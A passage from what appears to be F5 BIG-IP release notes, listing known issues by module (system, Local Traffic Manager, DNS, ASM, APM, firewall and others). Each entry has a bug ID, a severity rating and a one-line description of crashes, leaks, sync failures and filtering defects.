1788193-3 3-Major BT1788193 [MCP] Request logging should only be allowed with supported protocol profiles
1784137-1 3-Major BT1784137 Net stp-globals object config-name back to default value upon reboot
1759261-4 3-Major BT1759261 OSPF might fail to install external routes after topology change.
1755413-2 3-Major BT1755413 Fast scp file transfer may not display progress bar
1753489-2 3-Major BT1753489 BFD Commands Missing in ZebOS Config After Reboot or Restart for large configurations
1708957-2 3-Major BT1708957 Excessive debug logs can cause key management daemon failure
1677429-4 3-Major BT1677429 BFD: TMM might not agree on session ownership.
1670625-3 3-Major BT1670625 Incorrect set of TCAM rules
1670465-4 3-Major BT1670465 TMMs might not agree on session ownership when multiple cluster geometry changes occur.
1644497-4 3-Major BT1644497 TMM retains old Certificate Revocation List (CRL) data in memory until the existing connections are closed
1615081-4 3-Major BT1615081 Remove SHA and AES Constraint Checks in SNMPv3
1602629-4 3-Major BT1602629 Tmm_mcpmsg_print can trigger SOD
1602209-4 3-Major BT1602209 The bigipTrafficMgmt.conf file is not copied from UCS to /config/snmp
1599841-1 3-Major BT1599841 Partition access is not synced to Standby device after adding a remote user locally.
1596313-2 3-Major BT1596313 Deleting and re-adding a LAG on F5OS causes a validation failure in mcpd, therefore the trunk on the tenant has no interfaces
1586745-2 3-Major BT1586745 LACP trunk status became DOWN due to bcm56xxd failure
1580369-4 3-Major BT1580369 MCPD thrown exception when syncing from active device to standby device.
1560449-2 3-Major BT1560449 Rest_logintegrity does not suppress output to stderr
1438801-1 3-Major BT1438801 VLAN name greater than or equal to 32 characters causes VLAN to lose member information
1403869-5 3-Major BT1403869 CONNFLOW_FLAG_DOUBLE_LB flows might route traffic to a stale next hop
1377737-3 3-Major   SSL Orchestrator does not pass traffic when MAC masquerading is configured on R4k or R2k systems
1322413-5 3-Major BT1322413 After config sync, FQDN node status changes to Unknown/Unchecked on peer device
1316481-4 3-Major   Large CRL file update fails with memory allocation failure
1256757-1 3-Major   Suspect keymgmtd memory leak while using dynamic CRL.
1230109-1 3-Major BT1230109 Mcpd memory and CPU increase while getting route stats
1183901-9 3-Major BT1183901 VLAN name greater than 31 characters results in invalid F5OS tenant configuration
1168245-1 3-Major BT1168245 Browser is intermittently unable to contact the BIG-IP device
1137269 3-Major BT1137269 MCPD fails to reply if a request is proxied to another daemon and the connection to that daemon closes
1126505-1 3-Major BT1126505 HSB and switch pause frames impact data traffic
1106489-5 3-Major BT1106489 GRO/LRO is disabled in environments using the TMM raw socket "sock" driver.
1105361-2 3-Major BT1105361 Unable to deploy BIG-IP on Azure with D series(v5) or E series(v5) instance types
1040277-8 3-Major BT1040277 Syslog-ng issue may cause logging to stop and possible reboot of a system
1032001-4 3-Major BT1032001 Statemirror address can be configured on management network or clusterd restarting
1029173-6 3-Major BT1029173 MCPD fails to reply and does not log a valid message if there are problems replicating a transaction to PostgreSQL
1010301-2 3-Major BT1010301 Long-Running iCall script commands can result in iCall script failures or ceasing to run
1009337-7 3-Major BT1009337 LACP trunk down due to bcm56xxd send failure
1003225-5 3-Major BT1003225 'snmpget F5-BIGIP-LOCAL-MIB::ltmWebAccelerationProfileStat* returns zeroes
939517-7 4-Minor BT939517 DB variable scheduler.minsleepduration.ltm changes to default value after reboot
747823-4 4-Minor BT747823 Drd utility can hang when generating qkview
714705-10 4-Minor BT714705 Excessive 'The Service Check Date check was skipped' log messages.
659579-8 4-Minor BT659579 Timestamps in icrd, restjavad, and restnoded logs are not synchronized with the system time
2050389-2 4-Minor BT2050389 VIPRION cluster management IP may not appear in SNMP IP-MIB table
2012301-1 4-Minor   Upgrade the certificate to be compatible with the new upgraded gson package
2011341 4-Minor BT2011341 The address list file fails to load during an SCF file merge
1976689 4-Minor BT1976689 Memory Leak in publishing did information
1972321-2 4-Minor BT1972321 "IP Reputation" option does not show up when creating a rule in LTM policy
1968193-1 4-Minor BT1968193 Management Route name displayed incorrectly via API when the route name contains a forward slash (/)
1967293-3 4-Minor BT1967293 Re-configuring BFD multihop for a BGP peer does not work reliably.
1966669-2 4-Minor BT1966669 [PVA] Provide a DB variable disabling NAT46/64 snoop inserts.
1966053-1 4-Minor BT1966053 MCPD memory leak in firewall
1959785-2 4-Minor BT1959785 BIG-IP incorrectly marked as "Managed by BIG-IQ" by its BIG-IP HA peer
1934941-3 4-Minor BT1934941 Assertion failure in aspath_intern for BGPD.
1934457-4 4-Minor BT1934457 Cursor in BIG-IP Configuration Utility iRule editor appears in the incorrect position
1828005-1 4-Minor BT1828005 Syslog message does not carry log level when destination is remote
1778901-2 4-Minor BT1778901 PPTP-GRE proxy need tmstat table for connection error analysis
1688545-2 4-Minor BT1688545 PVA-processed traffic is not included in the route-domain stats via SNMP
1682101-2 4-Minor BT1682101 Restjavad CPU goes close to 100% during telemetry pollers collect stats
1677409-2 4-Minor BT1677409 Show auth login-failures does not show failures when remote auth falls back to local auth
1589421-1 4-Minor BT1589421 LTM Monitor not shown in Pool Member "Health Monitors" if Transparent attribute changes
1325737-1 4-Minor BT1325737 Standby tenant cannot access floating traffic group when MAC masquerade is enabled
1295217-1 4-Minor BT1295217 When provision.1nic is set to forced_enable the mgmt interface does not respond to ICMP
1089625-3 4-Minor BT1089625 Java core dump with SIGABRT while high cpu load in BIG-IP
1969873-2 5-Cosmetic BT1969873 IP reputation status is only available on primary blade


Local Traffic Manager Issues

ID Number Severity Links to More Info Description
1785385-2 1-Blocking BT1785385 Intermittent traffic failures when tenant is running BIG-IP v17.1.2 or above and host is on version prior to F5OS-A 1.8.0 or F5OS-C 1.8.0
1399369-2 1-Blocking BT1399369 While upgrading standby device, active device is going to standby mode for few seconds, and traffic loss is observed.
832153 2-Critical BT832153 Crash due to incorrect format specifiers is fixed.
632553-8 2-Critical K14947100, BT632553 DHCP: OFFER packets from server are intermittently dropped
1965329-1 2-Critical BT1965329 TMM may crash when re-declaring an LTM policy with a data-group
1937589-1 2-Critical BT1937589 LTM v17.x f5-irule.crt is valid only until Jul 2027
1935053-3 2-Critical BT1935053 Impact of crypto queue limits on SSL handshake reliability
1921085-1 2-Critical BT1921085 Core file generated when using FTP::ftps_mode require without SSL profile in TCP filter
1921049-1 2-Critical BT1921049 When L7 policy is updated, existing HTTP/2 connection using it gets a RST_STREAM
1854137-1 2-Critical BT1854137 Verified accept and pool reselect-tries may cause TCP proxy to core
1825357-2 2-Critical BT1825357 Possible tmm crash or traffic loss after making vlan interface changes with an empty trunk
1598405-5 2-Critical BT1598405 Intermittent TCP RST error 'HTTP internal error (bad state transition)' occurs for larger files when the Explicit Proxy virtual server uses HTTP_REQUEST_SEND iRule event
1481889-4 2-Critical BT1481889 High CPU utilization or crash when CACHE_REQUEST iRule parks.
1134257-6 2-Critical BT1134257 TMM cores when pingaccess profile is modified multiple times and configuration is loaded
1124865-5 2-Critical BT1124865 Removal of LAG member from an active LACP trunk on r2k and r4k systems requires tmm restart
1100249-6 2-Critical BT1100249 SNAT with FLOW_INIT firewall rule may core TMM due to wrong type of underlying flow structure
1091021-7 2-Critical BT1091021 The BIG-IP system may not take a fail-safe action when the bigd daemon becomes unresponsive.
1073897-5 2-Critical BT1073897 TMM core due to memory corruption
1009161-5 2-Critical BT1009161 SSL mirroring protect for null sessions
966785-7 3-Major BT966785 Rate Shaping stops TCP retransmission
905477-8 3-Major BT905477 The sdmd daemon cores during config sync when multiple devices configured for iRules LX
901569-7 3-Major BT901569 Loopback traffic might get dropped when VLAN filter is enabled for a virtual server.
870349-5 3-Major BT870349 Continuous restart of ntlmconnpool after the license reinstallation
783077-4 3-Major BT783077 IPv6 host defined via static route unreachable after BIG-IP reboot
739475-9 3-Major BT739475 Site-Local IPv6 Unicast Addresses support.
673060-2 3-Major BT673060 SSL handshake failure with Session Ticket enabled on the backend server
2035277-3 3-Major BT2035277 Modifying virtual-address 'enabled' setting might lead to unpredictable virtual-server availability
2035177-1 3-Major BT2035177 Use of OCSP responder with SSL C3D enabled in virtual server may leak SSL handshake instances
2035129-4 3-Major BT2035129 The CMP stream communication between tmms on different blades might stall after a tmm memory exhaustion event
2033781-1 3-Major BT2033781 Memory allocation failed: can't allocate memory to extend db size
2008633-1 3-Major BT2008633 Active mode FTP using port 0 for data-channel connections
1989125-1 3-Major BT1989125 TSval value of Ack packets sent by BIG-IP may roll back in time
1988981-2 3-Major BT1988981 TMM crashes after detaching and reattaching a DoS profile on the DNS virtual server
1987309-2 3-Major BT1987309 Bigd may get stuck in legacy mode
1972541-1 3-Major BT1972541 Tmsh load sys config verify leaks compiled ltm (CPM) policies
1969889 3-Major BT1969889 Expired certificates sent to clients by tmm due to network time synchronization
1962813-4 3-Major BT1962813 The csyncd daemon on one or more of the cluster's secondary blades does not synchronise RRD files from the primary
1959629-1 3-Major BT1959629 CSR generation via the GUI removes Subject Alternative Name (SAN) string. Also, when SAN is configured with small prefix chars "dns:", no error is thrown.
1952557-1 3-Major BT1952557 DB monitor incorrectly marks pool member UP if recv string configured but no results from DB server
1943257-1 3-Major BT1943257 HTTP monitor "last error" string sends incorrect response
1935713-2 3-Major BT1935713 TMM crash when handling traffic over vlangroup with autolasthop disabled.
1934397-2 3-Major BT1934397 SSL Orchestrator l2 inline monitor failure on r2000 or r4000 tenants
1934157-2 3-Major BT1934157 Http2 monitor fails if a pool is used for routing to pool members
1930897-1 3-Major BT1930897 Tmm core due to overflow of ifc ref counts with flow forwarding
1929045-3 3-Major BT1929045 TMM may core after HTTP::respond used for first request on iSession connection
1928169-1 3-Major BT1928169 HTTP2 RST_STREAM NO_ERROR received by BIG-IP not interpreted correctly
1921069-2 3-Major BT1921069 The error ERR_ARG occurs when using iRule HTTP::collect command without the parameter value in HTTP_REQUEST_DATA
1889861-3 3-Major BT1889861 Passive monitoring with ASM might not log the server response.
1889741-2 3-Major BT1889741 Need for the SYS DB variable to toggle ssl_crypto::queue_max
1849029 3-Major BT1849029 Debug TMM crashes in FIPS/CC mode
1824985-3 3-Major BT1824985 In rare cases the Nitrox hardware compression queue may stop servicing requests.
1824521-2 3-Major BT1824521 GUI: VLAN names are not populated while creating the vlan-group under Network Quick configuration
1788065-1 3-Major BT1788065 The rule cannot be deleted because it is in use by a rule
1758961-4 3-Major BT1758961 TMM may core if proxy_common_init errors out due to inappropriate NAT configuration
1624557-3 3-Major BT1624557 HTTP/2 with RAM cache enabled could cause BIG-IP to return HTTP 304 with content
1623921-3 3-Major BT1623921 IPencap monitor probes from bigd are prone to connection re-use.
1602641-5 3-Major BT1602641 Configuring verified-accept and SSL mirroring on the same virtual results in stalled connections.
1598381-1 3-Major BT1598381 Unable to set the key-usage setting while renewing the CSR
1596637-2 3-Major BT1596637 TLS1.3 with c3d and ocsp handshake failure
1585153-1 3-Major BT1585153 SSL handshake failures with error message Profile <name> cannot load key/cert/chain
1581685-4 3-Major BT1581685 iRule 'members' command counts FQDN pool members.
1549397-4 3-Major BT1549397 Pool member from statically-configured node deleted along with ephemeral pool member using same IP address
1474877-4 3-Major BT1474877 Unable to download large files through VIP due RST Compression error.
1473913-6 3-Major BT1473913 Proxy Connections drop due to wrong counting
1440409-6 3-Major BT1440409 TMM might crash or leak memory with certain logging configurations
1411365-1 3-Major BT1411365 CMP forwarded flows can be removed by other CMP forwarded flows incorrectly
1325649-3 3-Major BT1325649 POST request with "Expect: 100-Continue" and HTTP::collect + HTTP::release is not being passed to pool member
1231889-5 3-Major BT1231889 Mismatched VLAN names (or VLANs in non-Common partitions) do not work properly BIG-IP tenants running on r2000 / r4000-series appliances
1190753-1 3-Major BT1190753 HTTP/2 Virtual Server ignores customized HTTP known-methods list
1189909-1 3-Major BT1189909 Active SSL Connections Curve is always kept at Zero on Performance Graph
1128033-4 3-Major BT1128033 Neuron client constantly logs errors when TCAM database is full
1125381-5 3-Major BT1125381 Extraneous warnings recorded in when using only intermediate certificates
1110485-7 3-Major BT1110485 SSL handshake failures with invalid profile error
1091785-7 3-Major BT1091785 DBDaemon restarts unexpectedly and/or fails to restart under heavy load
1071385-5 3-Major BT1071385 SSL session resumption is incorrectly logging handshake failure messages
1036645-4 3-Major BT1036645 Running keyswap.sh on a VIPRION or VCMP platform may not complete successfully
1033937-6 3-Major BT1033937 HTTP message router stats do not increment for virtual servers and pools
1014633-6 3-Major BT1014633 Transparent / gateway monitors may fail if there is no route to a node
1012009-5 3-Major BT1012009 MQTT Message Routing virtual may result in TMM crash
990173-8 4-Minor BT990173 Dynconfd repeatedly sends the same mcp message to mcpd
932553-9 4-Minor BT932553 An HTTP request is not served when a remote logging server is down
896565-5 4-Minor   Clusterd.peermembertimeout to set peer member timeout does not work all the time
603380-9 4-Minor BT603380 Very large number of log messages in /var/log/ltm with ICMP unreachable packets.
2038309-1 4-Minor BT2038309 After the full config sync, FQDN template node status changes to ‘fqdn-checking’ (Unknown) untill the DNS query is triggered
1964933-2 4-Minor BT1964933 HTTP2 RST flood detection should allow for legitimate case
1953369-1 4-Minor BT1953369 DB monitor queries repeatedly if recv string configured but response does not match
1933965-2 4-Minor BT1933965 Unable to associate multiple cert/keys of different types to Certificate Key Chain via TMSH
1930841-1 4-Minor BT1930841 Tmsh show sys conn virtual-server may report an incomplete set of flows after a virtual server modification
1926733-1 4-Minor BT1926733 Tmm memory leak with L7 response policy
1921025-1 4-Minor BT1921025 Need more information when http2 RST STREAM
1756697-3 4-Minor BT1756697 Sec-WebSocket-Extensions header is not stripped when Compression is disabled
1670225-4 4-Minor BT1670225 'Last Error' field remains empty after initial monitor Down status post-reboot
1329509-4 4-Minor BT1329509 TCL error 'ERR_VAL (line 1) invoked from within "HTTP::path"'.
1004953-7 4-Minor BT1004953 HTTP does not fall back to HTTP/1.1


Performance Issues

ID Number Severity Links to More Info Description
1574521-2 5-Cosmetic BT1574521 Intermittent high packet latency on R4000 and R2000 tenants


Global Traffic Manager (DNS) Issues

ID Number Severity Links to More Info Description
2044381-3 2-Critical BT2044381 Gtmd SIGSEGV core due to monitor status change
2016613 2-Critical BT2016613 GTM link monitors using gateway-icmp may report "no reply from big3d"
1821089-4 2-Critical BT1821089 DNS64 and resolver cache may not function together as expected
936777-9 3-Major BT936777 Old local config is synced to other devices in the sync group.
1970969-1 3-Major BT1970969 Stale Record Answers counter increments for SERVFAIL responses from DNS resolver cache
1953273-1 3-Major BT1953273 Big3d high CPU with thousands of https monitors with SNI
1824113-3 3-Major BT1824113 GTM iRule : [active_members <poolname>] command ignores any status effects applied by a parent.
1824009-3 3-Major BT1824009 When DNS64 is enabled, resolver cache passes SERVFAIL responses to the client
1782137-2 3-Major BT1782137 Management of Wide IPs using the GUI may fail when multiple monitors exist
1757537-4 3-Major BT1757537 RCA tmm core with ** SIGSEGV ** inside pick_qos
1756389-2 3-Major BT1756389 CA certs could get deleted from server.crt after running bigip_add
1612201-3 3-Major BT1612201 Malformed certificates found in local /config/httpd/conf/ssl.crt/server.crt
1602345 3-Major BT1602345 Resource records are not always created when wideips are created in a bundle
1379649-5 3-Major BT1379649 GTM iRule not verifying WideIP type while getting pool from TCL command
1083405-7 3-Major BT1083405 "Error connecting to named socket" from zrd
1082197-3 3-Major BT1082197 RNAME and MNAME field order reversed for Synthetic SOAs sent for negative response
264701-8 4-Minor K10066, BT264701 The zrd exits on error from bind about .jnl file error
1711813-4 4-Minor BT1711813 Incorrect SOA serial number shown in zxfrd logs during zone transfer
1014761-6 4-Minor BT1014761 [DNS][GUI] Not able to enable/disable pool member from pool member property page


Application Security Manager Issues

ID Number Severity Links to More Info Description
1952821-2 2-Critical BT1952821 WAF guided configuration shows a warning message instead list of available configurations
1934373-2 2-Critical BT1934373 DoS attack is blocking while transparent
1933825-2 2-Critical BT1933825 High cpu usage by BD
902445-5 3-Major BT902445 ASM Policy Event Logging stops working after 'No space in shmem' error disconnection mitigation
2017105-2 3-Major BT2017105 Disk partition /var full after quick config changes
2016465-1 3-Major BT2016465 Policy auto merge does not work for Base64 Decoding
2008573-1 3-Major BT2008573 Login/Logout expected/unexpected string has no length validation
1992569-2 3-Major BT1992569 Request body held despite "do nothing" content profile setting
1989133-1 3-Major BT1989133 Unexpected blocking of valid login attempts after upgrade to version 17.5.0
1976705-1 3-Major BT1976705 Threat Campaign installation fails due to timeout after an hour
1976513-2 3-Major BT1976513 Some ASM entity names are not shown in the REST error response message
1972369-1 3-Major BT1972369 A specific performance improvement
1971217-1 3-Major BT1971217 False negative with illegal redirect attempt
1959709-3 3-Major BT1959709 "Europe" IPs are allowed despite blocking all European countries
1938101-1 3-Major BT1938101 Performance issue on specific parameters extractions
1938085-1 3-Major BT1938085 Performance issue on specific parameters extractions
1856513-2 3-Major BT1856513 Tomcat fails to write log messages to /usr/share/tomcat/logs/liveupdate.log
1849585-2 3-Major BT1849585 A correctly encoded long Authorization param triggers 'illegal base64 value' vaiolation
1827821-2 3-Major BT1827821 isBase64 params and headers not blocking Attack Signatures
1813717-4 3-Major BT1813717 Some blocked requests are not logged when filtered by response status codes
1772329-3 3-Major BT1772329 Apply Policy failure after upgrading to v16.1.x and later, from earlier version
1755113-4 3-Major BT1755113 BD crash with specific JSON schema
1710233-2 3-Major BT1710233 No option to disable violation for double-escaped NULL in query string
1633133-2 3-Major BT1633133 ASM TS cookies include trailing semicolon
1629857-2 3-Major BT1629857 Unexpected junk characters in ASM websocket traffic.
1601517-1 3-Major BT1601517 BD daemon crash on specific scenario
1429813-5 3-Major BT1429813 ASM introduce huge delay from time to time
1350485-2 3-Major BT1350485 When the parameter value contains '@', domain name is not properly extracted
974409-6 4-Minor   False Positive "Surfing Without Human Interaction"
2012801-2 4-Minor BT2012801 "parser parameters" is enabled even though json schema is attached to the profile
2007429 4-Minor BT2007429 Captcha button label displays in lowercase
1980649-2 4-Minor BT1980649 High CPU usage by bd
1975941-2 4-Minor BT1975941 Alternate_response_content length greater than 51200 in ACCOUNT_ALTERNATE_RESPONSE_FILE causing ASM restart loop
1974837-1 4-Minor BT1974837 MAIN|EROR|dosl7_hold_message:1004|trying to hold message already held
1970193-2 4-Minor BT1970193 Case WAF policy IP address exception list on GUI: Missing Route Domain ID in the IP address
1966313-2 4-Minor BT1966313 Websocket event logs show "N/A" for virtual server name except during upgrade request
1962073-1 4-Minor BT1962073 Creation of file type entries with trailing and/or leading spaces is allowed via REST in ASM policy
1933061-1 4-Minor BT1933061 Changing "bot category" of an user-defined bot-signature should be validated and denied when the change is not appropriate
1900621-2 4-Minor BT1900621 Missing client ip
1890997-1 4-Minor BT1890997 TCP connection stall in TMM conn table with ASM policy and no websocket profile
1821353-2 4-Minor BT1821353 Error on long wildcard configuration
1782057-2 4-Minor BT1782057 BD crash related to dns lookup
1505257-2 4-Minor BT1505257 False positive with "illegal base64 value" for Authorization header
1036289-1 4-Minor BT1036289 Signature ID not displayed in Attack Signature details
1036221-3 4-Minor BT1036221 "Illegal parameter value length" is reported with parsing product length.
1980601-1 5-Cosmetic BT1980601 Number of associated signatures for a signature-set appears zero


Application Visibility and Reporting Issues

ID Number Severity Links to More Info Description
1932965-1 2-Critical BT1932965 AVRD may crash at startup due to non-thread-safe version of BOOST json Spirit parser
1848577-2 2-Critical BT1848577 VCMP guest stats are not visible on vCMP host GUI nor CLI
939933-8 3-Major BT939933 Monpd restarts every few seconds due to missing of AVR database
1959361 3-Major BT1959361 When running a tenant with more than 72 VCPUs / cores, adminstall crashes
1937717-1 3-Major BT1937717 AVR increases the Content-Length header but fails to inject the CSPM script into the payload
1294141-6 3-Major BT1294141 ASM Resources Reporting graph displays over 1000% CPU usage
1298225-1 4-Minor BT1298225 Avrd generates core when dcd becomes unavailable due to some reason


Access Policy Manager Issues

ID Number Severity Links to More Info Description
945469-3 2-Critical   [APM][tmm core detected oauth_send_response in APM Oauth Token generation
2047445 2-Critical   VPN connection may fail when access policy is configured in route domain
1991297-1 2-Critical BT1991297 [APD][SAML-SSO]high memory due to SAML SSO leak
1975885 2-Critical BT1975885 Massive M_ACCESS string leak in TMM
1957157-1 2-Critical BT1957157 [nlad]OpenSSL: DRBG Continuous RNG test failed: DRBG stuck.
1819857-1 2-Critical BT1819857 [APM][PRP] Session variables are not able to access within Oauth Client agent intermittently
1670041-1 2-Critical   [SWG] VCMP all secondary slots restart when URL categories are modified/deleted
1397001-2 2-Critical BT1397001 Memory leak in websense when RTU is updated
1020881-3 2-Critical BT1020881 TMM crashes while passing APM traffic.
666845-6 3-Major K08684622, BT666845 Rewrite plugin can accumulate memory used for patching very large files
2035005-2 3-Major BT2035005 VMware Horizon applications launched via BIG-IP as VDI proxy ignore args parameter in vmware-view URI
2034985 3-Major   Unable to forward NTLM SSO back-end cookies to front-end
1998985-1 3-Major BT1998985 Displays "Page Unresponsive" error message when editing AD group resource with large AD group count
1993737-1 3-Major BT1993737 [APM][SSO]TMM Core in the SSO decompress operation
1991289-2 3-Major   ECA always invokes the default access profile 'kerberos_auth_default'
1991261-2 3-Major BT1991261 AAA LDAP: priority group activation resets when updating configuration in APM
1991241-2 3-Major BT1991241 ECA plugin unresponsive
1991237-2 3-Major   Unable to configure number of apmd thread using tmsh command
1987361-2 3-Major BT1987361 APMD file descriptor exhaustion when LDAP operational timeout is set to 180 seconds
1982937-1 3-Major BT1982937 InTune MDM endpoint compliance intermittently fails despite being compliant
1980645-2 3-Major BT1980645 Bypass APM for Horizon Blast/PcoIP connection for internal users
1976557-2 3-Major BT1976557 [APM][OAUTH][LOGGING]Error log needed misconfigured "audience" for apm oauth jwt-config
1969861-1 3-Major BT1969861 [APM][NTLM]ECA core SIGSEGV
1968169-2 3-Major BT1968169 [APM][CitrixIntegration]Apps do not launch unless "Accounts" is selected in Citrix Workspace App
1967261-3 3-Major BT1967261 RDP Parameter "enablerdsaadauth" when added to RDP setting causes file to be corrupted
1965257-1 3-Major BT1965257 Upgrade to 17.5.0 results in Invalid subscription request from (%localdbmgr) unknown class/struct tag (4576) error is seen in ltm log
1928157-1 3-Major BT1928157 [APM][SAML] constant SIGSEGV "in saml_sp_finish_message_signing" after upgrade to 17.1.x
1856285-3 3-Major BT1856285 [APM]mdmsyncmgr core is observed very intermittently
1848565-2 3-Major BT1848565 Error during updating device details: Internal error (Json parser error)
1818949-2 3-Major BT1818949 [APM] BIG-IP as OAuth AS sending invalid grant error when refresh token expired.
1787909-2 3-Major BT1787909 Sys db variable security.configpassword value is changed to not null when ng_export is interrupted
1772317-3 3-Major BT1772317 [APM][SAML SP] sp fails authentication with error "SAML assertion is invalid, error: NameID is missing"
1756897-2 3-Major BT1756897 [APM][PA]Failed to execute 'observe' on 'MutationObserver': parameter 1 is not of type 'Node'
1752873-2 3-Major BT1752873 [APM][SAML SP] Order of SAML attribute values saml.last.attr.name is reversed
1715153 3-Major BT1715153 Log message "The connected network is vulnerable to tunnel crack as LocalIP falls under the public IP"
1607277-4 3-Major BT1607277 Permission Denied error when trying to download the Windows Client Package from Connectivity Profile on Standby
1600229-2 3-Major BT1600229 Sometimes, admin is unable to apply policies until failover
1586405-3 3-Major BT1586405 "/f5-h-$$/" repeatedly appened to URL's path every refresh of the page
1554961-2 3-Major BT1554961 APM - Websso leeway time of 60 seconds
1489941-2 3-Major   PKCE 'code_challenge_methods_supported" to be included in openid-configuration well-know-uri
1485557-2 3-Major BT1485557 OAuth token not found for OAuth server with Bearer SSO
1290937-2 3-Major   'contentWindow' of a dynamically genereated iframe becomes null
1166929-2 3-Major BT1166929 [AdminUI][Rewrite Profile][PA] Add "*://*" to to rewrite list if an RCL has been entered
1136905-2 3-Major BT1136905 Request for Portal Access Hosted Content are RST with "No available SNAT addr"
1100081-3 3-Major K21440462, BT1100081 Error message "http_process_state_prepend - Invalid action:0x10a091" for version 15 and "http_process_state_prepend - Invalid action:0x107061" for versions 16 and 17 appears in the LTM log
1074285-4 3-Major BT1074285 Apmd crashes while handling JWT tokens.
937665-3 4-Minor BT937665 Relaystate in SLO request results in two Relaystates in SLO Response
800377-1 4-Minor BT800377 Support for Referrer-Policy: origin to correctly return backend origin in virtual server requests
1881145-3 4-Minor BT1881145 Change log level of PPP TunnelStats log messages to debug level
1856425-1 4-Minor BT1856425 Old EPSEC images keeps coming back on standby device after reboot
1825253-1 4-Minor BT1825253 Enhance the log message for better readability User session was terminated due to IP address change during session
1825249-1 4-Minor BT1825249 read_until: end of file
1787701-2 4-Minor BT1787701 [APM]Customization in German contains French language


Service Provider Issues

ID Number Severity Links to More Info Description
1268373-8 2-Critical BT1268373 MRF flow tear down can fill up the hudq causing leaks
1977057-3 3-Major BT1977057 Memory leak when using an iRule to overwrite MR peer route
1952881-1 3-Major BT1952881 Tmm memory leak in SCTP metadata


Advanced Firewall Manager Issues

ID Number Severity Links to More Info Description
2014373-2 2-Critical BT2014373 Fix for TMM Core SIGSEGV in spva_gl_ddos_find_tuples Due to NULL Grey List Flood Entry
1983553-1 2-Critical BT1983553 Unable to load config after upgrading to v17.5.x with the Syntax Error: "tcp-ack-flood" unknown property
1974869-2 2-Critical BT1974869 Unable to load config after upgrading to v17.5.0 with the Syntax Error: "state" may not be specified more than once.
1410441-3 2-Critical BT1410441 Large file transfer over SFTP/SSH proxy failure
2015973-2 3-Major BT2015973 Enabling tcp-ak-ts dos vector causes file transfer failure
2008185-2 3-Major BT2008185 The vectors threshold mode changes from Fully Automatic to Manual post upgrade
1991717 3-Major BT1991717 Upgrade fails from 17.5.0 to 17.5.1 if a shared object list is configured with Geo or FQDN's
1976925 3-Major BT1976925 Device dos whitelist not working properly for DNS dos protection when BA enabled
1969945-2 3-Major BT1969945 Stats_rate changes along with Detection Threshold for NXDOMAIN DoS vector
1968237-2 3-Major BT1968237 Configuration fails to load post upgrade due to invalid DoS signature predicate 'ip flags'
1965497 3-Major BT1965497 Firewall Policy is not effective when the same rule list is attached to two different firewall policies.
1957977-2 3-Major BT1957977 Auto-learned DoS Vector attack is detected even with low rate of traffic on HA Pair during Failover
1943593-2 3-Major BT1943593 Inconsistent DoS Attack Status between tmctl/event logs and GUI
1820489-2 3-Major BT1820489 Rule list order changes when modifying a rule using Filer Active Rules List
1786805-4 3-Major BT1786805 TMM might crash immediately after going active for the first time after a reboot
1510477-4 3-Major BT1510477 RD rule containing zones does not match expected traffic on the Network firewall policy
1365769-2 3-Major BT1365769 When multiple vlans are in the zone, only some vlans match the ACL-Policy
1282029-1 3-Major BT1282029 Logging suspicious vector feature is not supported for tcp-flags-uncommon vector on upgrade to BIG-IP 17.1.0
1917677-4 4-Minor BT1917677 "show security ip-intelligence info address" may fail to query legacy IP Reputation database
1880441-2 4-Minor BT1880441 Security log profile IPI options are visible for configuration in UI but not allowed


Policy Enforcement Manager Issues

ID Number Severity Links to More Info Description
1399017-6 2-Critical BT1399017 PEM iRule commands lead to TMM crash
2046553-1 3-Major BT2046553 Memory leak when modifying PEM policies with flow-info-filters
1976001-1 3-Major   PEM::session TCL commands can cause cores
1934073-2 3-Major BT1934073 PEM policy rule incorrectly matching when using a flow condition
1932161-3 3-Major BT1932161 PEM iRule usage memory leak
1785145-5 3-Major BT1785145 TMM SIGSEGV core due to NULL check is not handled properly in PEM


Carrier-Grade NAT Issues

ID Number Severity Links to More Info Description
1819721-3 3-Major BT1819721 LSN failed events details are ambiguous


Traffic Classification Engine Issues

ID Number Severity Links to More Info Description
1976429-2 3-Major BT1976429 Webroot database file updates are failing to apply, preventing the creation of a new version of the database file.
1824965-1 3-Major   Implement iRule support to fetch SNI from SSL, HTTP and QUIC traffic
1820573-2 3-Major BT1820573 PEM Traffic Classification signatures are classifying the youtube videos with quic enabled as udp.quic instead of udp.quic.youtube.youtube_video.youtube_video_abr on windows using the latest chrome web browser


Device Management Issues

ID Number Severity Links to More Info Description
718796-9 2-Critical K22162765, BT718796 iControl REST token issue after upgrade
996129-7 3-Major BT996129 The /var partition is full as cleanup of files on secondary is not executing
563144-6 3-Major BT563144 Changing the system's admin user causes many errors in the REST framework.


Protocol Inspection Issues

ID Number Severity Links to More Info Description
1590517-1 2-Critical BT1590517 High CPU utilization when enabling IPS + HTTP/2 Profile
1983029-2 3-Major BT1983029 IPS Upgrade: err mcpd[5374]: 01070734:3: Configuration error: DB validation exception, unique constraint violation on table
1967213-2 3-Major BT1967213 Active contexts accumulate while HTTP is waiting for response
1854461-2 3-Major BT1854461 Unable to delete file from "Available to Deploy" when removed from "Available to Install"
1824037-2 3-Major BT1824037 IPS profile using engine after free
1787981-3 3-Major BT1787981 Memory leak in ips_pcb_cache
1786457-3 3-Major BT1786457 Protocol Inspection auto update with latest is not working
1069977-1 3-Major BT1069977 Repeated TMM SIGABRT during ips_flow_process_data
1975945-1 4-Minor BT1975945 IPS signatures and compliance not loaded until the configuration is saved using tmsh save sys config


SSL Orchestrator Issues

ID Number Severity Links to More Info Description
1927829-1 3-Major BT1927829 SSL Orchestrator resets connection with connection abort waiting for data from an inline service
1849829-2 3-Major BT1849829 Deprecation of dnssec-lookaside and dnssec-enable Directives in latest BIND release
1589269-3 3-Major BT1589269 The maximum value of sys db provision.extramb was reduced from 8192 to 4096 MB
1934845-1 4-Minor BT1934845 Transparent proxy loses APM session variables in SSL Orchestrator service
1628129-2 4-Minor BT1628129 SSL Orchestrator traffic summary log does not display url-category for HTTP request if a SWG as a service blocks the connection


Bot Defense Issues

ID Number Severity Links to More Info Description
1820833-1 3-Major BT1820833 General Database Error when creating a new profile
1549341-2 3-Major BT1549341 BD: block response body is truncated at 1024Bytes
1552913-2 4-Minor BT1552913 For advanced/premium deployment of BD profile, incomplete single js download may lead to blocking Protected URIs.


F5OS Messaging Agent Issues

ID Number Severity Links to More Info Description
1881509-1 3-Major BT1881509 Platform Agent not logging Trunk changes from F5OS
1690005-2 3-Major BT1690005 Masquerade Mac is not removed when F5OS is rebooted
1359817-3 3-Major BT1359817 The setting of DB variable tm.macmasqaddr_per_vlan does not function correctly
1881537-1 5-Cosmetic BT1881537 Platform Agent does not log diff of Feature Info Attributes
